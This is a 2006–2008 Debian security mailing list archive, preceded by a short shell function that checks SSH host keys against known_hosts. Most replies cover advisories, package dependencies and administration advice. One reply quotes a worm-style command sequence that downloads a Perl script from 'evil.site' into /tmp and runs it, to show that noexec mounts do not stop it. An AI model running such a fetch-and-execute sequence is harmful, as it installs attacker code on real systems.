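# Return 0 if the key in PUBFILE appears in KNOWN_HOSTS, 1 otherwise.
pubkey_in_known_hosts() {
    known_hosts=$1; pubfile=$2
    want=$(key_blob < "$pubfile")
    [ -n "$want" ] || return 1
    while IFS= read -r line || [ -n "$line" ]; do
        case $line in ''|'#'*) continue ;; esac
        [ "$(printf '%s\n' "$line" | key_blob)" = "$want" ] && return 0
    done < "$known_hosts"
    return 1
}

# List the host-key files under SSHDIR (normally /etc/ssh) that KNOWN_HOSTS
# does NOT yet trust, one path per line; empty output = all keys known.
untrusted_host_keys() {
    known_hosts=$1; sshdir=$2
    for pub in "$sshdir"/ssh_host_*_key.pub; do
        [ -f "$pub" ] || continue
        pubkey_in_known_hosts "$known_hosts" "$pub" || echo "$pub"
    done
}

# Usage on a client that has a copy of the server's /etc/ssh/*.pub files:
#   untrusted_host_keys ~/.ssh/known_hosts /path/to/server-etc-ssh
```

Stale entries are removed on the client with `ssh-keygen -R <host>`, and the new fingerprint should be confirmed out of band before it is accepted.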





Re: securing server

2008-05-07 Thread Steve
On 07-05-2008, at 19:39:57 +0800, Abdul Bijur Vallarkodath ([EMAIL PROTECTED])
wrote:

>haha.  not really!  if you have really managed an online server you'd have
>seen tons of attacks and login attempts on your default ports by bots
>looking around for weaker systems.

Yes I have also seen that very often.

>This is hence especially helpful, I myself have seen these bot attacks
>reduce to almost zero once i had changed the port numbers of various
>services on my system.

Sure, but that doesn't mean you're more secure, just that you have
less scans (which can be achieved by some well-thought iptables rules).

> Now, you are talking about someone sitting and
>concentrating on your machine, thats a diff story all together. isn't it?

Yep, you're right. If someone really wants to attack you, changing
the default ports number will just postpone the moment the attacks will
really start.

>you are smart, you should have known all this.

Just tried to pinpoint an issue.

Best regards

--
Steve





Re: securing server

2008-05-07 Thread Steve
On 07-05-2008, at 17:34:08 +0800, Abdul Bijur Vallarkodath ([EMAIL PROTECTED])
wrote:

>just my two pence.

and my two centimes.

>*  Change the ports of most ports like ssh, ftp, smtp, imap etc. from the
>default ones to some other ones.

From my poor understanding of security-related issues, I guess this is
totally useless since any (good) port scanner will defeat this without
any problem. Remember, security by obscurity is a bad idea.

--
Steve





Re: [SECURITY] [DSA 1534-2] New iceape packages fix regression

2008-04-25 Thread Steve Kemp
On Thu Apr 24, 2008 at 14:13:14 -0700, Brad Dondale wrote:

> I have started 2 weeks holidays.  If you have any technical support
> requests, please create a ticket with your online ticket system.  Thanks!

  Please fix your broken auto-responding system.

Steve
-- 
Debian GNU/Linux System Administration
http://www.debian-administration.org/





Re: Is oldstable security support duration something to be proud of?

2008-03-10 Thread Steve Kemp
On Mon Mar 10, 2008 at 17:57:04 -0400, Filipus Klutiero wrote:

> It should be supported as long as RHEL.

  Give me piles of cash and I'll support it for as long as you want.

  But this discussion is pointless.  The statement is true *we* are
 proud; regardless of whether you or anybody else agrees or not.

  As has already been hashed out on the debian-www list.

Steve
-- 
http://www.steve.org.uk/





Re: [vendor-sec] Re: qemu unchecked block read/write vulnerability

2008-02-19 Thread Steve Kemp
> Oops, it looks like I got the address wrong.  I didn't intend to mail
> the public [EMAIL PROTECTED] list but rather the private security
> team list.  Too late now.

  For future reference we do see vendor-sec mails, so the second
 copy wasn't really necessary.  (Although it is helpful to make sure
 we get mails if it looks like there is no visible progress.)

  I hope that doesn't make you feel any worse!

Steve
--





Re: strange output for command ps

2008-01-30 Thread Steve Suehring

This looks normal to me.  I believe 'ps' cuts off the USER column after 
a certain number of characters.  To test, I just added a user 
'stevesuehring' to a local Debian etch box and then logged in as that 
user.  The ps output shows 1002 in the USER column rather than the name.

Steve

On Wed, Jan 30, 2008 at 11:48:10PM +0100, Lindo Nepi wrote:
> hi all.
> on my debian box (debian 4.0 , kernel  2.6.18-4-686 #1 SMP Wed May 9 
> 23:03:12 UTC 2007 i686 GNU/Linux )
> when i do "ps aux"  i obtain:
> 
> [EMAIL PROTECTED]:~$ ps aux
> USER   PID %CPU %MEMVSZ   RSS TTY  STAT START   TIME COMMAND
> root 1  0.0  0.1   1948   648 ?Ss   Jan17   0:01 init [2]
> root 2  0.0  0.0  0 0 ?SJan17   0:00 
> [migration/0]
> root 3  0.0  0.0  0 0 ?SN   Jan17   0:00 
> [ksoftirqd/0]
> root 4  0.0  0.0  0 0 ?S<   Jan17   0:00 [events/0]
> root 5  0.0  0.0  0 0 ?S<   Jan17   0:00 [khelper]
> root 6  0.0  0.0  0 0 ?S<   Jan17   0:00 [kthread]
> root 9  0.0  0.0  0 0 ?S<   Jan17   0:00 [kblockd/0]
> 
> [snip]
> 
> root  2620  0.0  0.1   1572   572 ?Ss   Jan17   0:00 
> /usr/sbin/acpid -c /etc/acpi/events -s /var/run/acp
> 103   2733  0.0  0.1   2252   860 ?Ss   Jan17   0:00 
> /usr/bin/dbus-daemon --system
> 106   2741  0.0  0.7   5572  4040 ?Ss   Jan17   0:01 
> /usr/sbin/hald
> root  2742  0.0  0.1   2892  1016 ?SJan17   0:00 hald-runner
> 106   2748  0.0  0.1   2020   852 ?SJan17   0:00 
> hald-addon-acpi: listening on acpid socket /var/run
> 106   2753  0.0  0.1   2020   864 ?SJan17   0:00 
> hald-addon-keyboard: listening on /dev/input/event0
> root  2762  0.0  0.1   1812   620 ?SJan17   0:10 
> hald-addon-storage: polling /dev/hdd
> 
> [snip]
> 
> www-data  6612  0.0  0.8  19112  4144 ?SN   07:36   0:00 
> /usr/sbin/apache2 -k start
> www-data  6613  0.0  0.8  19112  4144 ?SN   07:36   0:00 
> /usr/sbin/apache2 -k start
> www-data  6614  0.0  0.8  19112  4144 ?SN   07:36   0:00 
> /usr/sbin/apache2 -k start
> 121   6678  0.0 22.3 123368 115416 ?   SNs  07:44   0:06 
> /usr/sbin/dansguardian
> 121   6679  0.0 22.3 123372 115360 ?   SN   07:44   0:11 
> /usr/sbin/dansguardian
> 121   6680  0.0 22.8 126300 118064 ?   SN   07:44   0:03 
> /usr/sbin/dansguardian
> 121  24594  0.0 22.5 130296 116300 ?   SN   08:22   0:02 
> /usr/sbin/dansguardian
> 121  24595  0.0 22.4 126600 116096 ?   SN   08:22   0:00 
> /usr/sbin/dansguardian
> 121  24596  0.0 22.5 124892 116300 ?   SN   08:22   0:01 
> /usr/sbin/dansguardian
> 121  24597  0.0 22.4 124240 115944 ?   SN   08:22   0:00 
> /usr/sbin/dansguardian
> 121  24598  0.0 22.4 123980 115928 ?   SN   08:22   0:00 
> /usr/sbin/dansguardian
> 121  24599  0.0 22.4 123716 115920 ?   SN   08:22   0:00 
> /usr/sbin/dansguardian
> 121  24600  0.0 22.4 123748 116052 ?   SN   08:22   0:00 
> /usr/sbin/dansguardian
> 121  29196  0.0 22.5 153460 116680 ?   SN   17:18   0:02 
> /usr/sbin/dansguardian
> 121  29197  0.0 22.5 130292 116332 ?   SN   17:18   0:00 
> /usr/sbin/dansguardian
> 121  29198  0.0 22.4 127920 116224 ?   SN   17:18   0:00 
> /usr/sbin/dansguardian
> 121  29199  0.0 22.4 124280 116152 ?   SN   17:18   0:00 
> /usr/sbin/dansguardian
> ^
> 
> look here, ps shows UID , not username.
> 
> It's normal?
> of course uid=121(dansguardian) gid=114(dansguardian) 
> gruppi=114(dansguardian)
> 
> thanks
> 
> LN
> 
> 
> 
> 
> 





Re: [SECURITY] [DSA 1465-1] New apt-listchanges packages fix arbitrary code execution

2008-01-17 Thread Steve Kemp
On Thu Jan 17, 2008 at 16:35:47 +0100, Philipp Kern wrote:

> Still that breaks because os is not imported.  Please fix.  Quickly.

  Done.


Steve
-- 
# The Debian Security Audit Project.
http://www.debian.org/security/audit





Re: [SECURITY] [DSA 1448-1] New eggdrop packages fix execution of arbitrary code

2008-01-05 Thread Steve Kemp
On Sat Jan 05, 2008 at 15:11:22 +, Steve Kemp wrote:

> - 
> Debian Security Advisory DSA-1448-1  [EMAIL PROTECTED]
> http://www.debian.org/security/   Steve Kemp
> January 05, 2008  http://www.debian.org/security/faq
> - 

  Apologies for sending this mail out twice.

Steve
-- 




Re: ping22: can not kill this process

2008-01-04 Thread Steve Kemp
On Fri Jan 04, 2008 at 06:04:50 -0200, Felipe Figueiredo wrote:

> Anybody has a clue as to why was this default choosen, and not the safest one?

  Too many broken PHP applications?

  Anyway please see /usr/share/doc/php4-common/examples/ for
 different examples.  (Or /usr/share/doc/php5-common/examples).

Steve
-- 
http://www.steve.org.uk/




Re: [SECURITY] [DSA 1422-1] New e2fsprogs packages fix arbitrary code execution

2007-12-07 Thread Steve Kemp
On Fri Dec 07, 2007 at 18:41:35 +0100, Nico Golde wrote:

> What about those, are they unimportant?
> They are still present in the etch code. I stumbled
> upon them while preparing a testing-security upload.

  Unknown.  I used the patch provided by Theodore Tso, which he
 is/was planning on using for Sid/Ubuntu.

  If there are missing bits then we'll need to reissue the update,
 but right now I believed the patch was as complete as it needed
 to be.

> Sorry, this mail was originally only addressed to Steve but 
> since I also got this mail through the debian-security list 
> it ended up here now :)

  Fair enough.

Steve
-- 
# The Debian Security Audit Project.
http://www.debian.org/security/audit





Re: [SECURITY] [DSA 1422-1] New e2fsprogs packages fix arbitrary code execution

2007-12-07 Thread Steve Kemp
On Fri Dec 07, 2007 at 09:46:21 -0500, Juan Gallego wrote:

> | For the stable distribution (etch), this problem has been fixed in version
> | 1.39+1.40-WIP-2006.11.14+dfsg-2etch1.
> 
> | For the unstable distribution (sid), this problem will be fixed shortly.

> is sarge affected by this vulnerability? or has sarge been archived and i 
> missed the announcement?

  Sarge is affected, but I don't yet have a working patch for that.

  There should be an update shortly, but this is pretty low-risk and
 it seemed sensible to release now, rather than waiting.

Steve
-- 





Re: UNS: Re: [SECURITY] [DSA 1409-2] New samba packages fix several vulnerabilities

2007-11-27 Thread Steve Kemp
On Tue Nov 27, 2007 at 12:00:05 +1300, Ewen McNeill wrote:
> In message <[EMAIL PROTECTED]>, Steve Kemp writes:
> >Package: samba
> >Vulnerability  : several
> >Problem type   : remote
> >Debian-specific: no
> >CVE Id(s)  : CVE-2007-4572, CVE-2007-5398
> >[...]
> >For the stable distribution (etch), these problems have been fixed in
> >version 3.0.24-6etch7.
> 
> There doesn't appear to be a i386 package for Samba version
> 3.0.24-6etch7 on any of the security.debian.org servers.  Only a
> 3.0.24-6etch6 package.  AMD64 and most other architectures seem to have
> 3.0.24-6etch7 and not 3.0.24-6etch6 packages.


> According to the change log this means that one regression is missing
> in the i386 packages (6etch6):

  That is correct.

  I've built a package now, and will be uploading shortly.  In the
 meantime you can find it here:

http://people.debian.org/~skx/samba/

  I'm not entirely sure whether this fixes all known regressions; there
 seem to be mixed reports, but it is the best we have and the most
 current elsewhere.

Steve
-- 





Re: Firewall with woody

2007-10-17 Thread Steve Kemp
On Wed Oct 17, 2007 at 11:05:58 -0300, Jorge Escudero wrote:
> I have the Firewall with woody and I never had got any security problem.
> Is it risky to still using this version?

  Yes.

  There have been no security updates released for Woody in over a
 year, and that means there are liable to be security-relevant bugs
 present in your host(s).

> Do I have to upgrade the version any time a new one is release?

  You don't need to.  We can't force you.  But you should strongly
 consider the benefits of running a stable supported version of
 Debian which receives security fixes.

Steve
-- 
# Commercial Debian GNU/Linux Support
http://www.linux-administration.org/





Re: [SECURITY] [DSA 1379-1] New quagga packages fix denial of service

2007-10-04 Thread Steve Kemp
On Thu Oct 04, 2007 at 09:49:27 +0200, Etienne Favey wrote:

> In what respect is the quagga problem related to the openssl problem,
> that it gets the same DSA ID number?

  It was a mistake, the number was reused by accident.

Steve
-- 





Re: [SECURITY] [DSA 1376-1] New kdebase packages fix authentication bypass

2007-09-21 Thread Steve Kemp
On Fri Sep 21, 2007 at 19:18:38 +0300, Riku Valli wrote:

> fetchmailconf have similar problem too.

  That should be fixed now.  I'm just going to send out the mail ...

Steve
-- 





Re: [SECURITY] [DSA 1376-1] New kdebase packages fix authentication bypass

2007-09-21 Thread Steve Kemp
On Fri Sep 21, 2007 at 16:48:34 +0100, Adam D. Barratt wrote:

> I'm guessing the people reporting problems are i386 users. 

  Yeah, that seems to be the problem.  Thanks for being explicit
 about it though :)

> kdebase is arch:all and therefore installable on i386. kappfinder isn't
> and there aren't any i386 binary packages for it available.

  Noah has kindly volunteered to build complete packages for i386,
 so I'd expect this situation to be resolved in the next few hours.

Steve
-- 





Re: [SECURITY] [DSA 1376-1] New kdebase packages fix authentication bypass

2007-09-21 Thread Steve Kemp
On Fri Sep 21, 2007 at 11:45:37 -0400, Noah Meyerhans wrote:

> Check i386.  The security archive does not seem to have a complete set
> of i386 binary packages...

  Stupid buildds ..

  I'll find a spare i386 machine and build for that over the weekend
 all being well.

Steve
-- 





Re: [SECURITY] [DSA 1376-1]: missing dependencies result in removal of KDE

2007-09-21 Thread Steve Kemp
On Fri Sep 21, 2007 at 17:06:32 +0200, Georg Mainik wrote:

> there are missing dependencies for this new version of kdebase. People 
> running 
> cron-apt with automatic installation will get KDE completely removed!
> 
> I already wrote to Steve Kemp. Who else should be informed?

  All the dependencies are there:
http://security.debian.org/pool/updates/main/k/kdebase/

  I just replied to the previous message saying I wasn't sure what
 was wrong, if somebody can tell me I'm happy to take a look.

  As for who to tell, either this list or [EMAIL PROTECTED] is
 a good place.  Still I'm certainly aware of a potential problem
 now.

Steve
-- 





Re: [SECURITY] [DSA 1376-1] New kdebase packages fix authentication bypass

2007-09-21 Thread Steve Kemp
On Fri Sep 21, 2007 at 18:01:10 +0300, Riku Valli wrote:

> >For the stable distribution (etch), this problem has been fixed in version
> >4:3.5.5a.dfsg.1-6etch1.
> >
> >  
> 
> It seems at kdebase and fetchmailconf depencies are broken.

  I don't see what the source of this is.

>  kdebase: Depends: kappfinder (>= 4:3.5.5a.dfsg.1-6etch1) but
> 4:3.5.5a.dfsg.1-6 is installed.

  kappfinder is a binary coming from the kdebase package.

> Depends: kate (>= 4:3.5.5a.dfsg.1-6etch1) but 4:3.5.5a.dfsg.1-6 is
> installed.

  ditto.

  Unless I'm being dense the kdebase package provides all the
 correct versions to satisfy itself:

   eg.

kappfinder_3.5.5a.dfsg.1-6etch1_amd64.deb
kate_3.5.5a.dfsg.1-6etch1_amd64.deb

  (Same thing for fetchmail/fetchmailconf.)

Steve
-- 





Re: [DSA 1360-1] New rsync packages fix arbitrary code execution

2007-08-29 Thread Steve Kemp
On Tue Aug 28, 2007 at 15:24:24 -0400, Simon Valiquette wrote:

> > Stable updates are available for alpha, amd64, arm, hppa, i386,
> > ia64, mips, mipsel, powerpc, s390 and sparc.
> >
> 
>   There is no updated packages for Debian Etch PowerPC, contrarily
> to what is stated on the previous line.


>   Is there again a problem with the build host or something?

  That seems to be correct.  What was released was all that was
 available.  I should have updated that line - my belief was that
 it was automatically generated in the DSA-releasing process,
 so that I didn't need to.

  I'll check for the future to make sure that I only claim to
 provide those archs which have built.

Steve
-- 




Re: security.d.o packages for etch built on sarge

2007-06-30 Thread Steve Kemp
On Sun Jul 01, 2007 at 00:59:24 +0200, Karol Lewandowski wrote:
> On Mon, Jun 25, 2007 at 02:56:07PM +0200, karol wrote:
> 
> > It looks like etch's security updates were built on sarge.  python2.3
> > isn't available in etch making ekg's security update uninstallable.
> 
> I would be _very_ happy to hear _any_ comment on that.  I'll probably
> ask debian-devel if I won't get any answer in next few days.

  Etch security updates *should* be built upon Etch.  Sarge updates
 *should* be built upon Sarge.

  Anything else is liable to break and is a bug which should be fixed
 with an update.

  I've checked the build-logs I've got access to (all except i386) and
 they seem fine.  Is it just i386 you see this behavior upon?
 Do other people see this too, or is it a potentially broken system
 you're installing upon (I have to ask; some people still have mixed
 sources.lists files..)

Steve
-- 
Debian GNU/Linux System Administration
http://www.debian-administration.org/





Re: an issue with recent security advisories

2007-06-18 Thread Steve Kemp
On Mon Jun 18, 2007 at 19:49:28 +1000, Tomasz Ciolek wrote:

> been uploaded to the repositories and added to Releases and Packages
> files?

  Yes.

> Whats the point of making a security advisory if the packages are NOT
> AVAILABLE in mirrors and repositories
> 
> here is my sources.list... maybe I have some misconfiguraion ?

  You're missing:

  deb http://security.debian.org/ etch/updates main contrib non-free

  We suggest people never mirror the security archive, to avoid
 problems, and this is the place where security updates will be
 uploaded to.

  The sources lists you have would only receive new updates for
 point releases of Etch.

Steve
-- 





Re: [SECURITY] [DSA 1266-1] New gnupg packages fix signature forgery

2007-03-14 Thread Steve Langasek
On Wed, Mar 14, 2007 at 11:43:40AM +0100, Frank Küster wrote:
> Moritz Muehlenhoff <[EMAIL PROTECTED]> wrote:

> > For the upcoming stable distribution (etch) these problems have been
> > fixed in version 1.4.6-2.

> However, etch still has 1.4.6-1, and no freeze exception has been
> requested.

But it has been granted.

$ grep-excuses gnupg
gnupg (1.4.6-1 to 1.4.6-2)
Maintainer: James Troup
Too young, only 1 of 5 days old
Ignoring request to block package by freeze, due to unblock request by he
Not considered
$

We don't expect maintainers to request unblocks for RC bugfixes (in fact, I
prefer they don't, it's just extra mail to reply to).

> I'm not sure about the policy for security updates in etch, but it doesn't
> seem proper to announce the availability in a DSA if it's not yet true...

Hopefully, the fact that the security team made this statement means they
were aware 1.4.6-2 was a candidate for inclusion in etch.

-- 
Steve Langasek   Give me a lever long enough and a Free OS
Debian Developer   to set it on, and I can move the world.
[EMAIL PROTECTED]   http://www.debian.org/





Re: Bug#401969: please build using hunspell

2006-12-09 Thread Steve Kemp
On Fri, Dec 08, 2006 at 10:32:50PM +0100, Mike Hommey wrote:

> How does the security team feel about having to rebuild iceape,
> iceweasel, icedove (you forgot to file a bug on icedove), OOo and enchant
> if there happens to be a security bug in hunspell ?

  In general having multiple packages needing a rebuild for a
 single security fix is a problem, and not something we'd like
 to have to deal with.

  (For a specific example think of the pdf/gs updates we had to
 make earlier in the year/last year.  Lots of different programs
 with very similar code which didn't always get spotted at the
 same time.)

  A more recent example would be the links + elinks updates.  Links
 was updated first then we updated elinks afterwards when we learnt
 there was shared code ..  (Obvious in retrospect, but if there are
 a lot of packages which would require a rebuild keeping track of
 all of them can be difficult; especially if we don't know about it
 in advance.)

Steve
-- 




Re: Mass update deployment strategy

2006-11-27 Thread Steve Kemp
On Mon, Nov 27, 2006 at 08:37:42PM +0100, mario wrote:

> i am responsible for 10 (ubuntu and debian) installations so far.
> I have installed apticron which informs me about updates frequently. 
> Actually, its that often that i sometimes need to invest 1h a day just
> doing updates.

  Given the choice I'd much prefer identical distributions, even
 with a little pain, since things differ between Ubuntu & Debian
 (and Redhat/SuSE/etc).  Having two or more security update schedules
 and two lots of testing is more painful.

> Do you have a strategy or anything to automate this task a little more?

  cfengine.

  I'm interested in puppet, but it wasn't (isn't yet?) stable at
 the time I started automation on a decent sized farm.

Steve
-- 
Debian GNU/Linux System Administration
http://www.debian-administration.org/





Re: [TGSysadmin] [SECURITY] [DSA 1155-1] New sendmail packages fix denial of service

2006-08-24 Thread Steve Kemp
On Thu, Aug 24, 2006 at 09:17:06AM -0400, Paul Nesbit wrote:
> On Thu, Aug 24, 2006 at 08:23:59AM +0200, Martin Schulze <[EMAIL PROTECTED]> 
> wrote:
> > [...]
> > a MIME conversion routine in sendmail, a powerful, efficient, and
> > scalable mail transport agent, could be tricked 
> > [...]
> 
> Funny, bias in errata reports.

  All DSA notices have a description like that.  These descriptions
 come from the package itself.

  eg:

[EMAIL PROTECTED]:~$ apt-cache show sendmail  | grep Desc
Description: powerful, efficient, and scalable Mail Transport Agent

Steve
-- 
Debian GNU/Linux System Administration
http://www.debian-administration.org/



Re: editing "new" known_hosts files

2006-07-22 Thread Steve Kemp
On Sat, Jul 22, 2006 at 11:48:00PM +0200, LeVA wrote:

> I have reinstalled a server of mine, and now I need to remove it's old 
> pubkey from my $HOME/.ssh/known_hosts, but it is in the "new" format, 
> so no hostnames which may indicate which pubkey belongs to which host.
> How can I "decrypt" the known_hosts file?

  You can't decrypt them, but you can delete all entries for a given
 host with:

ssh-keygen -R host.name

  See the manpage for ssh-keygen for details.  (Search for "hash" to
 see the relevant options.)

Steve
-- 
Debian GNU/Linux System Administration
http://www.debian-administration.org/


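Both known_hosts points in this page (the DSA-1571 follow-up about clients rejecting a host whose keys were regenerated, and the question above about hashed entries that ssh-keygen -R answers) come down to how OpenSSH matches a host name against a hashed entry. The following is an added example, not code from OpenSSH or from anyone in the thread: it computes the |1|salt|hash field the way OpenSSH does (HMAC-SHA1 keyed with the stored salt over the host name) and uses that to remove every entry for a host from a constructed known_hosts file. The salt, host names and key blobs are made up.

```python
import base64
import hashlib
import hmac

# Constructed 20-byte salt (OpenSSH draws a random one per entry; SHA-1 digest size).
SALT = b"0123456789abcdefghij"


def hash_hostname(hostname, salt):
    """Build the '|1|<salt>|<hmac>' field OpenSSH writes when HashKnownHosts is on.

    The hash is HMAC-SHA1 keyed with the salt over the host name; the salt is
    stored alongside, so an entry can be checked against a name but not listed.
    """
    digest = hmac.new(salt, hostname.encode(), hashlib.sha1).digest()
    return "|1|%s|%s" % (base64.b64encode(salt).decode(),
                         base64.b64encode(digest).decode())


def entry_matches_host(hostfield, hostname):
    """True if a known_hosts host field, plain or hashed, names hostname."""
    if hostfield.startswith("|1|"):
        _, _, salt_b64, hash_b64 = hostfield.split("|", 3)
        salt = base64.b64decode(salt_b64)
        expected = base64.b64decode(hash_b64)
        digest = hmac.new(salt, hostname.encode(), hashlib.sha1).digest()
        return hmac.compare_digest(digest, expected)
    # Plain entries may list several names and addresses separated by commas.
    # (OpenSSH wildcard and '!' patterns are not handled here.)
    return hostname in hostfield.split(",")


def remove_host(known_hosts_text, hostname):
    """Drop every entry for hostname; returns (kept_lines, removed_lines).

    This is what 'ssh-keygen -R hostname' does, done in memory so the
    matching logic is visible.
    """
    kept, removed = [], []
    for line in known_hosts_text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            kept.append(line)
            continue
        fields = stripped.split()
        # An optional marker (@cert-authority, @revoked) precedes the host field.
        hostfield = fields[1] if fields[0].startswith("@") else fields[0]
        (removed if entry_matches_host(hostfield, hostname) else kept).append(line)
    return kept, removed


# Constructed sample file; the key blobs are placeholders, not real keys.
SAMPLE_KNOWN_HOSTS = "\n".join([
    "# constructed sample known_hosts",
    hash_hostname("example.org", SALT) + " ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC0example",
    hash_hostname("mail.example.org", SALT) + " ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1example",
    "example.org,192.0.2.10 ssh-dss AAAAB3NzaC1kc3MAAACBAexample",
    "files.example.net ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC2example",
])

if __name__ == "__main__":
    kept, removed = remove_host(SAMPLE_KNOWN_HOSTS, "example.org")
    print("removed %d entries, kept %d lines" % (len(removed), len(kept)))
```

On a real file use ssh-keygen -R host, which also leaves a known_hosts.old backup. Run it for the address as well as the name, since OpenSSH writes a separate hashed entry for the IP when CheckHostIP is on, and for the [host]:port form when a non-standard port was used. The plain-entry match above is an exact match and does not handle OpenSSH's wildcard or negated patterns.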



Re: BADSIG verifying s.d.o Release file

2006-06-30 Thread Steve Kemp
On Fri, Jun 30, 2006 at 10:33:55AM +0200, martin f krafft wrote:
> also sprach Steve Kemp <[EMAIL PROTECTED]> [2006.06.30.1004 +0200]:
> >   This is a known issue, relating to some of the infrastructure
> >  changes.  Hopefully it will be resolved shortly.
> 
> Thanks Steve. Do you know why this was not publicised beforehand on
> debian-security-announce or debian-announce?

  I think nobody thought of it to be honest, and people started
 to notice just around the time we did.

  (The problem here comes from the new "dak" software being used to
 handle the archive, and this is just a problem that hadn't been
 spotted since we've only just started releasing advisories with it.)

Steve
-- 




Re: BADSIG verifying s.d.o Release file

2006-06-30 Thread Steve Kemp
On Fri, Jun 30, 2006 at 09:15:42AM +0200, martin f krafft wrote:
> I've been seeing this a bunch in the past few weeks. Just making
> sure you know about it, and maybe someone knows what's going on:
> 
> W: GPG error: http://security.debian.org stable/updates Release: The
> following signatures were invalid: BADSIG 010908312D230C5F Debian
> Archive Automatic Signing Key (2006) <[EMAIL PROTECTED]>

  This is a known issue, relating to some of the infrastructure
 changes.  Hopefully it will be resolved shortly.

  Currently each of the release files are empty...

Steve
-- 




Re: Command history log for audit trail

2006-06-15 Thread Steve Kemp
On Thu, Jun 15, 2006 at 01:08:37PM -0700, [EMAIL PROTECTED] wrote:

> I need to set up an audit trail for all commands run on machines.  I
> know that the auth.log records who logs in and when, and that each
> user's .bash_history has a history of their commands.  But is there some
> other way to create a log for all commands run on a system?

  Use the 'snoopy' package, as described here:

http://www.debian-administration.org/articles/88

Steve
-- 





Re: Debian Kernel security status?

2006-04-21 Thread Steve Kemp
On Thu, Apr 20, 2006 at 04:18:28PM +0200, Jan Luehr wrote:

> Btw. Why do a lot of DSAs care about oldstable, while kernel-updates avoid 
> woody?

  Because building kernels is hard for Sarge and very hard for Woody.

  I seem to recall Joey asking for volunteers to help work on kernels
 a good few months back ...

  DSAs for woody will probably cease soon as well.

  From memory we promised a year of support after the release of Sarge.
 Sarge was released early June, so that gives us the end of this month
 and then just May to continue with.

  Of course if it isn't too hard, or there is a lot of demand, it
 may be possible to continue supporting it for a little longer.

Steve
-- 
# The Debian Security Audit Project.
http://www.debian.org/security/audit





Re: security issues with apache!

2006-03-12 Thread Steve Kemp
On Mon, Mar 13, 2006 at 09:02:13AM +0200, Enver ALTIN wrote:

> If you have to leave some writable folders for Apache user, say, /tmp, 
> moving /tmp to another partition/filesystem and mounting it with 
> "noexec" option would prevent most harm /any/ PHP script can cause.

  Not true.

  Several of the recent exploit worms do the equivalent of this:

cd /tmp
wget http://evil.site/perl/script.pl
perl /tmp/script.pl &

  Even if the /tmp partition is mounted noexec this will still work.
 (Although '/tmp/script.pl &' would fail.)

  Noexec can help in some situations, but blocking 'wget', 'perl'
 etc in requests via mod_security is a much more useful thing to
 do.

Steve
-- 
Debian GNU/Linux System Administration
http://www.debian-administration.org/


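The point above is that noexec stops a script under /tmp from being executed directly, not from being read by an interpreter, so the useful control is to catch the fetch-and-run pattern in the request itself, which is what the mod_security suggestion amounts to. The following is an added example, not part of the thread and not mod_security code: it runs that kind of check over a few constructed Apache combined-log lines, decoding the query string repeatedly first, because double URL encoding is the usual way to slip past a naive filter. The log lines, paths and addresses are made up.

```python
import re
from urllib.parse import unquote_plus

# Apache "combined" log line: client, identd, user, [timestamp], "METHOD target HTTP/x", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

REMOTE_URL = re.compile(r"\b(?:https?|ftp)://", re.I)
FETCH_TOOLS = re.compile(r"\b(?:wget|curl|fetch|lynx|links)\b", re.I)
# An interpreter started on a file under a world-writable directory: this is the
# step noexec does not stop, because the interpreter, not the script, is executed.
INTERPRETER_ON_TMP = re.compile(r"\b(?:perl|python|php|sh|bash)\b\s+/(?:tmp|var/tmp|dev/shm)/", re.I)
SHELL_META = re.compile(r"[;|`]|\$\(")


def decode_deeply(s, rounds=3):
    """Undo URL encoding repeatedly; attackers double-encode to evade filters."""
    for _ in range(rounds):
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    return s


def classify_request(target):
    """Return a list of finding tags for one request target (path?query)."""
    query = target.partition("?")[2]
    if not query:
        return []
    q = decode_deeply(query)
    findings = []
    if REMOTE_URL.search(q):
        findings.append("remote-url")          # remote file inclusion attempt
    if FETCH_TOOLS.search(q) and REMOTE_URL.search(q):
        findings.append("remote-fetch")        # wget/curl of a remote script
    if INTERPRETER_ON_TMP.search(q):
        findings.append("interpreter-on-tmp")  # perl /tmp/x.pl and friends
    if SHELL_META.search(q):
        findings.append("shell-meta")          # command chaining characters
    return findings


def scan_log(text):
    """Return (client_ip, target, findings) for every suspicious request line."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = classify_request(m.group("target"))
        if findings:
            hits.append((m.group("ip"), m.group("target"), findings))
    return hits


# Constructed sample log (example data only; addresses are from documentation ranges).
SAMPLE_LOG = """\
198.51.100.7 - - [12/Mar/2006:09:10:11 +0200] "GET /index.php?page=about HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Mar/2006:09:10:12 +0200] "GET /index.php?page=http://203.0.113.5/x.txt? HTTP/1.1" 200 99 "-" "libwww-perl/5.805"
203.0.113.9 - - [12/Mar/2006:09:11:02 +0200] "GET /cgi-bin/report.pl?dir=|cd%20/tmp;wget%20http://203.0.113.5/perl/script.pl;perl%20/tmp/script.pl| HTTP/1.1" 200 0 "-" "Mozilla/4.0"
192.0.2.44 - - [12/Mar/2006:09:12:40 +0200] "POST /upload.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.9 - - [12/Mar/2006:09:13:00 +0200] "GET /x.php?cmd=cd%2520/tmp%253Bcurl%2520http%253A//203.0.113.5/a%2520-o%2520/tmp/a HTTP/1.1" 200 0 "-" "Mozilla/4.0"
"""

if __name__ == "__main__":
    for ip, target, findings in scan_log(SAMPLE_LOG):
        print(ip, ",".join(findings), target)
```

Tune the patterns to the application before blocking on them: "links" and "fetch" in particular turn up in legitimate parameters, and a remote URL in a parameter is only a finding when the application has no business accepting one.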



Re: Another problem with gnupg

2006-03-10 Thread Steve Kemp
On Fri, Mar 10, 2006 at 09:42:00AM -0600, Michael Knoop wrote:
> There is a new problem with the gnupg program and digital signatures.
> 
> <http://lists.gnupg.org/pipermail/gnupg-announce/2006q1/000216.html>

  The original problem was fixed with DSA-978.

  This new, related, problem will be fixed shortly - new packages are
 already in the queue.

Steve
-- 





Re: [gna-private] [SECURITY] [DSA 987-1] New tar packages fix arbitrary code execution

2006-03-08 Thread Steve Kemp
On Wed, Mar 08, 2006 at 09:41:39AM +0100, Mathieu Roy wrote:

> > Package: tar
